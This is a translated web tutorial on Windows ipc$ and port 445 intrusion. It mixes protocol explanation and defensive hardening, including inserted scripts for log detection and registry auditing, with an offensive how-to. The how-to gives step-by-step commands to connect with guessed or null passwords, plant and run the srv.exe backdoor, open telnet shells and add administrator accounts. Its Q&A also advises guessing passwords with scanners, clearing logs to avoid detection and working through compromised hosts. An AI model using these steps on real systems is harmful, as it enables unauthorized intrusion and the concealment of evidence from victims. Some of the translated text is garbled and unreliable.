Port 445 intrusion: a detailed explanation

Source: Internet
Author: User


Before discussing port 445 intrusion, the first thing to look at is why port 445 became an intrusion port in the first place.
Port 445 is the default port of the IPC service.
ipc$
1. Summary
2. What is ipc$
3. What is a null session
4. What a null session can do
5. The ports used by ipc$
6. The significance of IPC pipes in hacking attacks
7. Common causes of ipc$ connection failure
8. Reasons why a file copy fails
9. Limitations of the AT command and of XP for ipc$
10. How to open the target's ipc$ share and other shares
11. Operations that require a shell
12. Commands that may be used in an intrusion
13. ipc$ intrusions past and present
14. How to prevent ipc$ intrusion
15. Selected ipc$ intrusion questions and answers
16. Closing
1. Summary
There are many articles online about ipc$ intrusion, and the attack steps have practically become a fixed recipe, so nobody bothers to revisit something that has turned into a formula. Even so, I find that these articles do not explain things specifically, and some of their content is outright wrong. As a result, questions about ipc$ make up almost half of the discussion area on security forums, and the same questions come up again and again, which seriously hurts the quality of the forums and the efficiency of learning. So I have put this article together in the hope of explaining ipc$ as clearly as possible.
Note: Every scenario discussed in this article assumes a Windows NT/2000 environment; Windows 98 is not covered.
2. What is ipc$
ipc$ (Internet Process Connection) is a share that exposes a named pipe. The pipe is opened for inter-process communication: by supplying a trusted user name and password, the two sides establish a secure channel and exchange encrypted data over it, which allows access to the remote computer. ipc$ is a new feature of NT/2000 with one peculiarity: at any given time only one connection is allowed between the same two IP addresses. Alongside ipc$, NT/2000 also turns on the default shares when the system is first installed, that is, the shares for all logical drives (c$, d$, e$ ...) and the share of the system directory Winnt or Windows (admin$). Microsoft's intention with all of these was to make administration easier, but intentionally or not the result was a reduction in system security.
We often hear people talk about the "ipc$ vulnerability". In fact ipc$ is not a vulnerability in the true sense. I think the people who say this must be referring to the "backdoor" Microsoft itself left in place: the null session. So what is a null session?
3. What is a null session
Before introducing the null session, it is important to understand how a secure session is built.
Windows NT 4.0 uses a challenge-response protocol to establish a session with a remote machine. A successfully established session becomes a secure tunnel through which the two parties exchange information. The process goes roughly as follows:
1) The session requester (client) sends a packet to the session recipient (server) requesting that a secure tunnel be established;
2) The server generates a random 64-bit number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number generated by the server, scrambles it with the password of the account it is trying to establish the session with, and returns the result to the server (the response);
4) The server receives the response and hands it to the Local Security Authority (LSA). The LSA verifies the requester's identity by checking the response against the user's correct password. If the requester's account is a local account on the server, the verification happens locally; if it is a domain account, the response is forwarded to a domain controller for verification. Once the response to the challenge is verified as correct, an access token is generated and delivered to the client. The client uses this access token to connect to resources on the server until the session is terminated.
That is the general process of establishing a secure session. So what about a null session?
A null session is a session established with the server without trust, that is, without supplying a user name and password. Under the Windows 2000 access control model, establishing a session still requires a token, but a null session is not authenticated with any user information while it is being set up, so its token contains no user information, and the system will not send encrypted information over such a session. That does not mean the null session's token has no security identifier (the SID identifies the user and the groups it belongs to). For a null session, the SID in the token supplied by the LSA is S-1-5-7, the null session SID, and the user name is ANONYMOUS LOGON (this user name appears in the user list but not in the SAM database; it is a built-in system account). The access token contains the following impersonation groups:
Everyone
Network
Within the limits of the security policy, a null session is therefore authorized to access whatever these two groups have permission to access. So what can you do once a null session is established?
4. What a null session can do
On NT, under the default security settings, a null connection can be used to enumerate the target host's users and shares, access shares that grant permission to Everyone, read a small part of the registry, and so on. On Windows 2000 it is of little use: from Windows 2000 onwards only Administrators and Backup Operators have the right to access the registry over the network, and doing so is inconvenient and requires tools.
From this we can see that such an untrusted session is not much use on its own, but from the perspective of a complete ipc$ intrusion the null session is an indispensable stepping stone, because it yields a list of users, and most weak-password scanning tools use that user list for their password guessing. Successfully exporting the user list raises the success rate of guessing, which is enough to explain the security implications of the null session; saying that null sessions are useless is simply wrong. Here are some of the commands that can be used in a null session:
1 First, set up a null session (which of course requires the target to have ipc$ open)
Command: net use \\ip\ipc$ "" /user:""
Note: The command above contains four spaces: one between net and use, one after use, and one on each side of the empty password.
2 View the shared resources of the remote host
Command: net view \\ip
Explanation: Once a null connection is established, this command shows the remote host's shared resources, if there are any. The result looks like the following, but this command cannot display the default shares.
Shared resources at \\*.*.*.*
Share name   Type   Used as   Comment
-----------------------------------------------------------
NETLOGON     Disk             Logon server share
SYSVOL       Disk             Logon server share
The command completed successfully.
3 View the current time of the remote host
Command: net time \\ip
Explanation: This command returns the remote host's current time.
4 Get the NetBIOS name table of the remote host (NBT must be enabled on your own machine)
Command: nbtstat -A ip
This command returns the remote host's NetBIOS name table, which looks like the following:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name               Type         Status
---------------------------------------------
SERVER         <00>  UNIQUE      Registered
OYAMANISHI-H   <00>  GROUP       Registered
OYAMANISHI-H   <1C>  GROUP       Registered
SERVER         <20>  UNIQUE      Registered
OYAMANISHI-H   <1B>  UNIQUE      Registered
OYAMANISHI-H   <1E>  GROUP       Registered
SERVER         <03>  UNIQUE      Registered
OYAMANISHI-H   <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
INET~SERVICES  <1C>  GROUP       Registered
IS~SERVER......<00>  UNIQUE      Registered
MAC Address = 00-50-8B-9A-2D-37
These are the things we usually do with a null session; it looks like we can get quite a lot. Just note that establishing an ipc$ connection leaves a record in the target's event log whether or not the logon succeeds. Now let's look at the ports ipc$ uses.
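That event log record is what a defender has to work with. As an added example (not part of the original article), the Python script below flags null-session logons in a simplified tab-separated export of Security log logon records; the export format, the constructed sample records and the alert threshold are assumptions, while the S-1-5-7 SID and the ANONYMOUS LOGON name are the ones given in section 3.

```python
"""Flag null-session (anonymous) network logons in exported Security log records.

Added example, not part of the original article. It works on a simplified
tab-separated export (constructed below) instead of reading the Event Log
directly, so it runs anywhere; the fields mirror what a Windows 2000 Security
log logon record carries: time, event id, account name, account domain,
user SID, logon type and source workstation.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Iterable

# SID and account name Windows assigns to a null session (section 3).
NULL_SESSION_SID = "S-1-5-7"
NULL_SESSION_ACCOUNT = "ANONYMOUS LOGON"
NETWORK_LOGON_TYPE = 3  # logon type 3 = network logon; ipc$ connections are this type


@dataclass(frozen=True)
class LogonRecord:
    time: str
    event_id: int
    account: str
    domain: str
    sid: str
    logon_type: int
    workstation: str


def parse_export(lines: Iterable[str]) -> list[LogonRecord]:
    """Parse tab-separated records; skip blank lines and the header row."""
    records = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("time\t"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError(f"malformed record: {raw!r}")
        time, event_id, account, domain, sid, logon_type, ws = fields
        records.append(LogonRecord(time, int(event_id), account, domain, sid, int(logon_type), ws))
    return records


def is_null_session(rec: LogonRecord) -> bool:
    """A null session shows up as a network logon by the anonymous SID.
    Match on the SID first (it cannot be renamed), the account name as a fallback."""
    if rec.logon_type != NETWORK_LOGON_TYPE:
        return False
    return rec.sid == NULL_SESSION_SID or rec.account.upper() == NULL_SESSION_ACCOUNT


def null_session_sources(records: Iterable[LogonRecord], threshold: int = 3) -> dict[str, int]:
    """Count anonymous network logons per source workstation and return the
    sources at or above `threshold`. A burst from one host is what user/share
    enumeration by a scanner looks like; a single hit is often benign
    (a browser-list announcement, for example)."""
    counts = Counter(r.workstation for r in records if is_null_session(r))
    return {ws: n for ws, n in counts.items() if n >= threshold}


# Constructed sample export (SIDs and host names invented). Event 540 was
# "successful network logon" on Windows 2000; Vista and later use 4624.
SAMPLE_EXPORT = """time\tevent_id\taccount\tdomain\tsid\tlogon_type\tworkstation
2003-05-01 09:12:01\t540\tALICE\tCORP\tS-1-5-21-1004336348-1177238915-682003330-1104\t3\tWS-ALICE
2003-05-01 09:12:07\t540\tANONYMOUS LOGON\tNT AUTHORITY\tS-1-5-7\t3\tSCANBOX
2003-05-01 09:12:07\t540\tANONYMOUS LOGON\tNT AUTHORITY\tS-1-5-7\t3\tSCANBOX
2003-05-01 09:12:08\t540\tANONYMOUS LOGON\tNT AUTHORITY\tS-1-5-7\t3\tSCANBOX
2003-05-01 09:12:08\t540\tANONYMOUS LOGON\tNT AUTHORITY\tS-1-5-7\t3\tSCANBOX
2003-05-01 09:30:44\t540\tANONYMOUS LOGON\tNT AUTHORITY\tS-1-5-7\t3\tPRINTSRV
2003-05-01 09:31:02\t528\tBOB\tCORP\tS-1-5-21-1004336348-1177238915-682003330-1105\t2\tWS-BOB
"""


def report(export_text: str = SAMPLE_EXPORT, threshold: int = 3) -> dict[str, int]:
    """Parse an export and return the suspicious null-session sources."""
    return null_session_sources(parse_export(export_text.splitlines()), threshold)


if __name__ == "__main__":
    for ws, n in report().items():
        print(f"{ws}: {n} anonymous network logons")
```

Against the sample, only SCANBOX crosses the default threshold; lowering it to 1 also surfaces the single PRINTSRV hit.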
5. The ports used by ipc$
First, some basic knowledge:
1 SMB (Server Message Block): the Windows protocol family for file and print sharing services;
2 NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to carry NetBIOS over TCP/IP;
3 In Windows NT, SMB runs on top of NBT, that is, it uses port 139 (TCP). In Windows 2000, besides the NBT-based implementation, SMB can also be carried directly over port 445.
With this in mind we can look at how a network share chooses its port:
For a Windows 2000 client (initiator):
1 If the client has NBT enabled, it tries ports 139 and 445 at the same time when connecting to the server. If port 445 responds, the client sends an RST to port 139 to close that connection and carries on the session over port 445; if port 445 does not respond, it uses port 139; if neither port responds, the session fails;
2 If the client has NBT disabled, it only tries port 445; if port 445 does not respond, the session fails.
For a Windows 2000 server:
1 If NBT is enabled, UDP ports 137 and 138 and TCP ports 139 and 445 are open (LISTENING);
2 If NBT is disabled, only port 445 is open.
An ipc$ session follows the same port selection rules. Clearly, if the remote server is listening on neither port 139 nor port 445, no ipc$ session can be established.
6. The significance of IPC pipes in hacking attacks
The IPC pipe was designed to make remote administration easier for administrators, but in the eyes of an intruder a host with the IPC pipe open looks far more approachable. Through the IPC pipe we can remotely invoke some system functions (mostly via tools, and only with the corresponding permissions), which is often the key to a successful intrusion. Even leaving that aside, the IPC pipe already gives the intruder a great deal of help and has become the most important channel for transferring files, which is why in every forum you see people asking helplessly what to do because they cannot open the target machine's IPC pipe. Of course, we must not ignore the important role permissions play with the IPC pipe; you have surely tasted the frustration of a null session: without permissions, an open pipe leaves us helpless too. But once an intruder obtains Administrator rights, the double-edged sword of the IPC pipe shows its ugly side.
7. Common causes of ipc$ connection failure
The following are some common reasons an ipc$ connection fails:
1 IPC connections are a feature of Windows NT and later, because they rely on a great many DLL functions that only exist in Windows NT. They cannot be made from Windows 9x/Me; in other words, only NT/2000/XP can establish ipc$ connections with each other, and 98/Me cannot;
2 Even for a null connection, a successful ipc$ connection requires the responder to have the ipc$ share open. If the responder has closed the ipc$ share, no connection can be established;
3 The initiator has not started the LanmanWorkstation service (display name: Workstation). It provides network connections and communication; without it the initiator cannot send a connection request;
4 The responder has not started the LanmanServer service (display name: Server). It provides RPC support and file, print and named pipe sharing, and ipc$ depends on it; without it the host cannot answer the initiator's connection request, although it can still initiate ipc$ connections itself;
5 The responder has not started NetLogon, which supports pass-through account logon for computers on the network (this is rarely the case);
6 Ports 139 and 445 on the responder are not in the listening state or are blocked by a firewall;
7 The initiator does not have ports 139 and 445 open;
8 Wrong user name or password: if this happens, the system gives an error message like "Cannot update password" (obviously a null session is immune to this error);
9 Command typing error: perhaps a space too many or too few. When the user name and password contain no spaces, the quotation marks around the two arguments can be omitted; if the password is empty, just type two quotation marks "";
10 If the other side restarts its computer while the connection is established, the ipc$ connection is dropped and must be established again.
In addition, you can analyse the cause from the error number returned:
Error 5, access denied: the user you are connecting as is very likely not an administrator;
Error (number missing in the original), Windows cannot find the network path: there is a problem with the network;
Error 53, the network path was not found: wrong IP address, target not powered on, target's LanmanServer service not started, or the target has a firewall (port filtering);
Error 67, the network name cannot be found: your LanmanWorkstation service is not started, or the target has deleted ipc$;
Error 1219, the supplied credentials conflict with an existing set of credentials: you already have an ipc$ connection to this host; delete it and reconnect;
Error 1326, unknown user name or bad password: the cause is obvious;
Error 1792, an attempt was made to log on but the network logon service was not started: the target's NetLogon service is not started;
Error 2242, the password of this user has expired: the target has an account policy that forces passwords to be changed periodically.
8. Reasons why a file copy fails
Some friends establish the ipc$ connection successfully but then run into trouble when copying: the copy just will not succeed. So what are the common causes of a failed copy?
1 The other side has no open shared directory
This is the most frequent error, accounting for more than half of the cases. Many friends, after establishing the ipc$ connection, do not even know whether the other side has a shared directory and copy blindly, and then get depressed when the copy fails. So I suggest you always run net view \\ip before copying to check that the shared directory you want to copy to actually exists (better still, use a tool). Do not assume that being able to establish an ipc$ connection means a shared directory exists.
2 Copying to a default share fails
This is another mistake everyone makes, and it has two main aspects:
1) Wrongly assuming that a host you can establish an ipc$ connection with must have the default shares enabled, and copying to c$, d$, admin$ and so on as soon as the connection is up. If the other side has not enabled the default shares, the copy fails. A successful ipc$ connection only shows that the other side has the ipc$ share open, not that the default shares exist. The ipc$ share is not the same as the default shares: ipc$ is a named pipe, not a real directory, while the default shares are real shared directories;
2) Because net view \\ip cannot display the default shares (their names end in $), this command cannot tell us whether the other side has the default shares enabled. If they are not enabled, every operation against them fails (most scanning software can detect the default shares along with weak passwords, which avoids this kind of error).
Key point: be sure to distinguish the IPC share, the default shares and ordinary shares. The IPC share is a pipe, not a real shared directory; the default shares are the directories opened by default at installation time; ordinary shares are shared directories on which we can set permissions.
3 Insufficient user rights, which covers four scenarios:
1) A null connection has insufficient permissions to copy to any share (default or ordinary);
2) For copying to the default shares, on Windows 2000 Professional only members of the Administrators and Backup Operators groups have enough permission; on Windows 2000 Server members of the Server Operators group can also access these shares;
3) For copying to an ordinary share you need the corresponding permissions (that is, the access rights the other side's administrator has set);
4) The other side may have forbidden external access to its shares through a firewall or security software settings;
Attention:
1 Do not assume that the account named Administrator necessarily has administrator rights; the administrator's name can be changed.
2 An administrator can access the default shares but not necessarily an ordinary share, because an administrator can set permissions on ordinary shares. For example, if the administrator has set the D-drive share to allow only the user named xinxin, then even with administrator rights you still cannot access that share. Interestingly, if the other side has the d$ default share enabled at the same time, you can access d$ and so bypass the restriction; interested friends can test this themselves.
4 Killed by a firewall, or the target is on a LAN
There is another situation: your copy may actually have succeeded, but when the program is executed remotely it is killed by a firewall, so the file cannot be found; or you copied a trojan to a host on a private LAN, so the connection fails (a reverse-connecting trojan does not have this problem). If you did not think of this, you would take it for a copy problem, when in fact the copy succeeded and it is the execution that failed.
Well, we all know that all kinds of problems come up when actually working with ipc$ connections. What I have summed up above is just a few common mistakes; if I have missed something, feel free to remind me.
9. Limitations of the AT command and of XP for ipc$
I also wanted to explain how to run a program remotely with at, but given that at's success rate is not high and it causes many problems, I will not go into it here (the more it is explained, the more people use it). Instead I recommend using psexec.exe for remote execution. Suppose you want the remote machine to run the local file c:\xinxin.exe, the administrator account is administrator and the password is 1234; enter the following command:
psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe
If an IPC connection is already established, the -u and -p parameters are not needed. psexec.exe copies the file to the remote machine by itself and executes it.
I did not originally want to discuss ipc$ on XP here, intending to cover it separately, but I see more and more friends eagerly asking why most operations are so hard to get working against XP, so I will mention it briefly. In XP's default security options, no matter what account you connect with, remote access is only given Guest permissions. That is, even if you use the Administrator account and password, the permissions you get are only those of Guest, so most operations fail for lack of permissions, and so far there is no good way around this limit. So even if you really have the XP administrator password, I suggest you avoid the IPC pipe.
10. How to open the target's ipc$ share and other shares
Opening ipc$ on a target is not easy; if it were, the world would be in chaos. You need a shell with administrator privileges, such as Telnet, a trojan or a cmd redirector, and then run the following in that shell:
net share ipc$
opens the target's ipc$ share;
net share ipc$ /del
closes the target's ipc$ share. If you want to open a shared directory, you can use:
net share xinxin=c:\
which shares the C drive as a shared directory named xinxin. (I have found that many people mistakenly believe the command to open a shared directory is net share c$, and this even gets passed on to newcomers, which is really harmful.) Again, these operations are done in a shell.
11. Operations that require a shell
Many tutorials are very imprecise on this point: some commands that can only be completed in a shell are simply written as if they ran under an ipc$ connection, which is misleading. So here is a summary of the operations that must be done in a shell:
1 Creating a user on the remote host, activating a user, changing a user's password and adding a user to the administrators group all have to be done in a shell;
2 Opening the remote host's ipc$ share, default shares or ordinary shares has to be done in a shell;
3 Starting/stopping services on the remote host has to be done in a shell;
4 Starting/killing processes on the remote host also has to be done in a shell (except with tools such as PsKill).
12. Commands that may be used in an intrusion
For the sake of completeness I have listed some frequently used commands in ipc$ intrusions; if you already know them, skip to the next section. Note that these commands are either local or remote: the local ones can only be executed on the remote host once you have obtained a shell on it (cmd, Telnet and so on).
1 Commands for creating/deleting an ipc$ connection
1) Establish a null connection:
net use \\127.0.0.1\ipc$ "" /user:""
2) Establish a non-null connection:
net use \\127.0.0.1\ipc$ "password" /user:"username"
3) Delete the connection:
net use \\127.0.0.1\ipc$ /del
2 Commands that operate on the remote host over an ipc$ connection
1) View the remote host's shared resources (default shares are not shown):
net view \\127.0.0.1
2) View the remote host's current time:
net time \\127.0.0.1
3) Get the remote host's NetBIOS name table:
nbtstat -A 127.0.0.1
4) Map/remove a remote share:
net use z: \\127.0.0.1\c
This command maps the share named c to the local drive Z:
net use z: /del
This removes the mapped drive Z:; other drive letters work the same way
5) Copy a file to the remote host:
copy path\filename \\ip\sharename, for example:
copy c:\xinxin.exe \\127.0.0.1\c$ copies xinxin.exe from the local C drive to the other side's C drive
Of course, you can also copy a file from the remote host to your own machine:
copy \\127.0.0.1\c$\xinxin.exe c:\
6) Add a scheduled task remotely:
at \\ip time program, for example:
at \\127.0.0.1 11:00am xinxin.exe
Note: Use the 24-hour clock where possible. If the program to be run is not in a directory on the system's default search path (for example system32), the full path must be given.
3 Local commands
1) View the local host's shared resources (the local default shares are shown)
net share
2) List the local host's users
net user
3) Show the account information of a local user
net user accountname
4) Show the services currently started on the local host
net start
5) Start/stop a local service
net start servicename
net stop servicename
6) Add an account locally
net user accountname password /add
7) Activate a disabled user
net user accountname /active:yes
8) Add an account to the Administrators group
net localgroup administrators accountname /add
Obviously, although these are local commands, if you type them in a shell on the remote host, for example after a successful Telnet, they take effect on the remote host.
4 Some other commands
1) Telnet
telnet ip port
telnet 127.0.0.1 23
2) Use OpenTelnet.exe to enable Telnet on the remote host
OpenTelnet.exe \\ip administratoraccount password NTLMauthenticationmode port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
This little tool needs four conditions to be met:
1) The target has the ipc$ share open
2) You have the administrator account and password
3) The target has the RemoteRegistry service running, so that the NTLM authentication mode can be changed
4) It only works on Win2K/XP
3) Use psexec.exe to get a shell in one step; requires the IPC pipe
psexec.exe \\ip -u administratoraccount -p password cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
13. ipc$ intrusions past and present
Since this is about control, let me first walk everyone through the ipc$ intrusion steps of the past; these are the classic steps:
[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:administrator
// Establish a connection with a null password found by scanning
[2]
C:\>net view \\127.0.0.1
// View the remote shared resources
[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
// Copy the one-time backdoor srv.exe to the other side's system directory, if admin$ is enabled
[4]
C:\>net time \\127.0.0.1
// View the remote host's current time
[5]
C:\>at \\127.0.0.1 time srv.exe
// Run srv.exe remotely with the at command; requires the other side to have the Task Scheduler service running
[6]
C:\>net time \\127.0.0.1
// Check the current time again to estimate whether srv.exe has run; this step can be omitted
[7]
C:\>telnet 127.0.0.1 99
// Open a new window and telnet to 127.0.0.1 to get a shell (what is a shell? Think of it as a remote control for the machine, operated like DOS). The port is the one opened by srv.exe, the one-time backdoor
[8]
C:\winnt\system32>net start telnet
// In the shell we just obtained, start the remote machine's Telnet service. After all, srv.exe is a one-time backdoor and we need a lasting one for later access; if the other side's Telnet is already started, this step can be omitted
[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
// In the original window, copy over ntlm.exe, which is used to change the Telnet authentication mode
[10]
C:\winnt\system32>ntlm.exe
// Run ntlm.exe in the shell window; from now on you can telnet to the host
[11]
C:\>telnet 127.0.0.1 23
// In the new window, telnet to 127.0.0.1 (port 23 can be omitted); now we have a lasting backdoor
[12]
C:\winnt\system32>net user accountname password /add
C:\winnt\system32>net user guest /active:yes
C:\winnt\system32>net localgroup administrators accountname /add
// After telnetting in, you can create a new account, activate Guest, add any account to the administrators group, and so on
All right, I feel I have gone back two or three years, when ipc$ was used this way. With the arrival of new tools, some of the tools and commands above are used less often now, so let's look at today's efficient and simple ipc$ intrusion.
[1]
psexec.exe \\ip -u administratoraccount -p password cmd
// With this tool we get a shell in one step
OpenTelnet.exe \\server administratoraccount password NTLMauthenticationmode port
// With it we can easily change the Telnet authentication mode and port, which makes logging in convenient
[2]
There is no second step. Once you have a shell you can do anything: install a backdoor with WinShell, clone accounts with CA, open the terminal service with 3389.vbe, record passwords with Win2kpass; in short, there are many good tools, the choice is yours, and I will say no more.
14. How to prevent ipc$ intrusion
1 Stop null connections from enumerating (this does not prevent the null connection itself from being established)
Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and set the DWORD value RestrictAnonymous to 1.
With the value set to 1, an anonymous user can still connect to the ipc$ share but can no longer enumerate SAM accounts and share information through such a connection. The value 2 was added in Windows 2000: users without anonymous rights can then no longer establish ipc$ null connections at all. The recommended setting is 1. If the key mentioned above does not exist, create it and then set the value. If you find editing the registry troublesome, you can set this option in Local Security Settings: Local Security Settings - Local Policies - Security Options - "Additional restrictions for anonymous connections".
2 Disable the default shares
1) View the local shared resources
Run cmd and type net share
2) Delete the shares (the default shares come back after a restart)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are e, f, ... drives, keep deleting them)
3) Stop the Server service
net stop server /y (the Server service starts again after a restart)
4) Stop the machine from creating the default shares itself (this does not close the ipc$ share)
Run regedit
Server edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set AutoShareServer (DWORD) to 00000000.
Professional edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set AutoShareWks (DWORD) to 00000000.
Neither of these values exists on the host by default; they have to be added manually, and the setting takes effect after the machine is restarted.
3 Turn off the service that ipc$ and the default shares depend on: the Server service
If you really want to turn off the ipc$ share, disable the Server service:
Control Panel - Administrative Tools - Services - find the Server service (right-click) - Properties - General - Startup type - choose Disabled. You may be warned that the XXX service will also shut down and asked whether to continue; that is because some secondary services depend on the Server service, so ignore it.
4 Block ports 139 and 445
Without these two ports ipc$ cannot be established, so blocking ports 139 and 445 also prevents ipc$ intrusion.
1) Port 139 can be blocked by disabling NBT
Local Area Connection - TCP/IP Properties - Advanced - WINS - select "Disable NetBIOS over TCP/IP"
2) Port 445 can be blocked by changing the registry
Add the following value:
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Name: SmbDeviceEnabled
Type: REG_DWORD
Value: 0
Restart the machine after the change
Note: If you block these two ports, you will not be able to use ipc$ against others either.
3) Install a firewall for port filtering
5 Set a complex password to prevent brute-force password guessing through ipc$. I think this is the best way; raising security awareness is more effective than constant patching.
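As an added example, not part of the original article, the Python script below audits the four registry values this section describes (RestrictAnonymous, AutoShareServer, AutoShareWks, SmbDeviceEnabled) against the recommended settings. The evaluation logic takes a plain dict so it runs anywhere; collect_local() reads the live registry through Python's winreg module and only works on Windows, and the two sample states are constructed.

```python
"""Audit the registry hardening settings from section 14 against ipc$ abuse.

Added example, not part of the original article. It checks the four values
the text names; reading them from the live registry needs Windows, so the
decision logic is kept separate and takes a plain dict, which is what the
constructed sample states at the bottom exercise.
"""

LSA = r"SYSTEM\CurrentControlSet\Control\Lsa"
LANMANSERVER = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
NETBT = r"SYSTEM\CurrentControlSet\Services\NetBT\Parameters"

# (key, value name) -> (what it controls, acceptable values, meaning of a missing value).
# All keys live under HKEY_LOCAL_MACHINE.
CHECKS = {
    (LSA, "RestrictAnonymous"): (
        "null-session enumeration of users and shares",
        {1, 2},  # 1 blocks enumeration; 2 (Windows 2000) also blocks the null connection itself
        "absent behaves like 0: anonymous enumeration allowed",
    ),
    (LANMANSERVER, "AutoShareServer"): (
        "automatic default shares (c$, admin$ ...) on Server editions",
        {0},
        "absent: default shares are recreated at every start",
    ),
    (LANMANSERVER, "AutoShareWks"): (
        "automatic default shares on Professional editions",
        {0},
        "absent: default shares are recreated at every start",
    ),
    (NETBT, "SmbDeviceEnabled"): (
        "SMB directly over TCP port 445",
        {0},
        "absent: port 445 is listening",
    ),
}


def evaluate(settings: dict, is_server: bool) -> list:
    """Return (value name, finding) pairs for every check not in the recommended state.

    `settings` maps (key, name) -> int, with None for a value that does not exist;
    the text notes the AutoShare* values are absent by default and must be created."""
    findings = []
    for (key, name), (what, ok_values, absent_meaning) in CHECKS.items():
        # Only one of the two AutoShare* values applies to a given edition.
        if name == "AutoShareServer" and not is_server:
            continue
        if name == "AutoShareWks" and is_server:
            continue
        value = settings.get((key, name))
        if value is None:
            findings.append((name, f"{what}: value missing ({absent_meaning})"))
        elif value not in ok_values:
            findings.append((name, f"{what}: set to {value}, expected one of {sorted(ok_values)}"))
    return findings


def collect_local() -> dict:
    """Read the four values from the live registry (Windows only)."""
    import winreg  # standard library on Windows; imported here so evaluate() stays portable

    settings = {}
    for key, name in CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as handle:
                settings[(key, name)] = winreg.QueryValueEx(handle, name)[0]
        except FileNotFoundError:  # key or value does not exist
            settings[(key, name)] = None
    return settings


# Constructed states: a Windows 2000 Professional machine left at its defaults
# (AutoShareWks and SmbDeviceEnabled not present), and one hardened as section 14 describes.
DEFAULT_PRO = {(LSA, "RestrictAnonymous"): 0}
HARDENED_PRO = {
    (LSA, "RestrictAnonymous"): 1,
    (LANMANSERVER, "AutoShareWks"): 0,
    (NETBT, "SmbDeviceEnabled"): 0,
}

if __name__ == "__main__":
    for label, state in (("default", DEFAULT_PRO), ("hardened", HARDENED_PRO)):
        print(label, evaluate(state, is_server=False) or "no findings")
```

On a real Windows host, pass collect_local() to evaluate() instead of the constructed dicts.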
Ipc$ Invasion Quiz Selection
The above said a lot of theoretical things, but in practice you will encounter a variety of problems, so in order to give everyone the greatest help, I have organized the major security Forum some representative questions and answers, some of which are I give, some of the reply on the forum, if there is any doubt, can come to me to discuss.
1. When the ipc$ intrusion is made, the records are left in the server, is there any way to keep the server from discovering it?
A: Leave a record is certain, you go after using clear log program Delete can, or with broiler invasion.
2. Looking at the output below, why can I connect but not copy?
NET use \\***.***.***.***\ipc$ "password"/user: "username"
Command succeeded
Copy Icmd.exe \\***.***.***.***\admin$
The network path could not be found
Command not successful
A: Errors like "The network path could not be found" or "The network name cannot be found" mostly occur because the shared directory you are trying to copy to is not open, so the copy fails. Try another shared directory.
3. Suppose the other side has ipc$ open and a null connection can be established, but opening the C and D drives requires a password. I know a null connection does not have much access, but is there another way?
A: It is recommended to use Streamer or other scanning software to try to guess the password. If you cannot guess it, give up; after all, the capabilities of a null connection are limited.
4. I have guessed the administrator's password and the ipc$ connection succeeded, but net view \\ip shows that the default shares are not open. What should I do?
A: First, correct one of your mistakes: net view \\ip cannot show the default shares. Try copying a file to c$ or d$; if that fails, the default shares have been closed, so use OpenTelnet.exe or PsExec.exe with the method described above.
5. The ipc$ connection succeeded and I created an account with the following command, but the account showed up on my own machine. What is going on?
net user ccbirds /add
A: A successful ipc$ connection only means you have a communication channel to the remote host; it does not mean you have a shell. Only after you obtain a shell (for example Telnet) can you create an account on the remote machine; otherwise your command runs locally.
6. I have got into a compromised host with the administrator account and can see its system time, but copying a program to the machine fails every time with "Access is denied, 0 file(s) copied". Is some service on the other side not started? What should I do?
A: Generally, "Access is denied" is the result of insufficient permissions. It may be that the account you are using has a problem. Another possibility: if you are copying to an ordinary shared directory and get this error, the directory's permission settings do not include you (even if you are an administrator), which I analysed in an earlier section.
7. Can I use Win98 to establish an ipc$ connection with another machine?
A: In theory, no. To carry out ipc$ operations it is recommended to use Win2000; other operating systems will bring a lot of unnecessary trouble.
8. I used net use \\ip\ipc$ "" /user:"" and successfully established a null session, but nbtstat -a IP cannot export the user list. Why?
A: A null session can export the user list by default, but if the administrator has prevented the list from being exported through a registry change this is what happens. Your own NBT may also not be enabled, and the nbtstat command relies on NBT.
9. When I establish an ipc$ connection, the following message comes back: "The supplied credentials conflict with an existing set of credentials". What is going on?
A: This indicates that you already have an ipc$ connection to the target host; two ipc$ connections between the same pair of hosts at the same time are not allowed.
10. I get this when mapping a drive:
F:\>net Use H: \\211.161.134.*\e$
The system has a 85 error.
The local device name is already in use. What's going on?
A: You are too careless: it means you already have an H: drive. Map to a drive letter that is not in use!
11. I established the connection f:\>net use \\*.*.*.*\ipc$ "123" /user:"Guest" successfully, but when I tried to map a drive I got an error asking me for a password. What is going on?
F:\>net Use H: \\*.*.*.*\c$
Password is invalid in \\*.*.*.*\c$.
Please type \\*.*.*.*\c$ password:
The system has a 5 error.
Refusal to access the interview.
A: Being asked for a password means the rights of the user you are currently using are not enough to map the default share c$. Either raise your permissions or find the administrator's weak password! The default shares usually require administrator privileges.
12. I used SuperScan and found a host with port 139 open, but why can't I make a null connection?
A: You are confusing the relationship between ipc$ and port 139. A host that accepts ipc$ connections must have port 139 or 445 open, but a host with those ports open will not necessarily accept a connection, because the other side can turn off ipc$ sharing.
13. The machines on our LAN are mostly XP. With Streamer I scanned several administrator accounts with empty passwords and can connect, but cannot copy anything; it reports error 5. May I ask why?
A: XP's security is higher. In the default security policy, network logons with local accounts are authenticated as Guest, so even if you log in remotely as the administrator you only have Guest permissions. When you copy a file you of course get error 5: insufficient permissions.
